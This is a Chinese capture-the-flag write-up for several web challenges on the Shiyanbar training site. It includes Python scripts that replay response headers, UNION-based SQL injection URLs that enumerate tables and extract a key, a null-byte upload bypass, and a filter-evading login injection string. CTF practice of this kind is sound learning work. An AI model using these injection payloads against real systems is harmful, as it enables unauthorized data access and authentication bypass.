实验吧Web题writeup

天下武功唯快不破

看看响应头,requests and urllib两种写法

1
2
3
4
5
6
7
8
9
10
11
12
import requests,base64

def main():
    url = 'http://ctf5.shiyanbar.com/web/10/10.php'
    s = requests.session()
    req = s.get(url)
    key = base64.b64decode(req.headers['flag']).decode('utf-8')[25:]
    # print(key)
    response = s.post(url,data={'key':key})
    print(response.text)

main()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from urllib import request,parse
import base64


def main():
    url = 'http://ctf5.shiyanbar.com/web/10/10.php'
    req = request.Request(url)
    req.add_header("Cookie", "PHPSESSID=ga0un6plm7tea9li11bgnommh1")
    response = request.urlopen(req)
    head = response.getheaders()[3][1]
    post = base64.b64decode(head).decode('utf-8')[25:]
    data = parse.urlencode([('key',post)])
    response = request.urlopen(req,data.encode('utf-8'))
    print(response.read().decode('utf-8'))

main()

这个看起来有点简单!

常规注入

1
2
3
4
5
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,2
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,database()
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema=database()
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_name="thiskey"
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey

猫抓老鼠

看看响应头

content-Pow不是标准头信息,将值作为key再次提交得到flag

what a fuck!这是什么鬼东西?

fuckjs,jjencode

上传绕过

00截断绕过,先抓取数据包

修改包,如下图

+对应2b,修改为00

发送得到flag

因缺思汀的绕过

右键源代码可以看到注释信息source.txt
可以看到过滤了and|select|from|where|union|join|sleep|benchmark
使用group by pwd with rollup查询
' or 1=1 group by pwd with rollup limit 1 offset 2 #

后台登录

php名字->提交->flag